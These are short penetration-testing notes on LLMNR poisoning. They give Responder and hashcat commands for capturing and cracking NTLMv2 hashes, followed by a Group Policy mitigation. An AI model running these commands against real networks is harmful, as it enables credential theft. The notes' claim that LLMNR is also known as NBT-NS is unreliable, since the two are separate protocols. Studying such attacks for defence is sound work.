• Link-Local Multicast Name Resolution
• Also known as NBT-NS
• Used to identify hosts when DNS fails to do so.
• Key flaw is that the services utilize a users’s username and NTLMv2 hash when appropriately responded to.

Conducting LLMNR poisoning attack

Step 1: Run Responder

sudo responder -I eth0 -dwP

Step 2: Trigger an event

Step 3: Hash gets captured

Cracking the captured hash

hashcat -m 5600 hahses.txt /usr/share/wordlists/rockyou.txt
#if already cracked use this --show to see the cracked hash
hashcat -m 5600 hahses.txt /usr/share/wordlists/rockyou.txt --show

LLMNR Poisoning Mitigation

The best defense in this case is to disable LLMNR and NBT-NS.

• To disable LLMNR, select "Turn OFF Multicast Name Resolution" under Local Computer Policy > Computer Configuration> Administrative Templates > Network > DNS Client in the Group Policy Editor.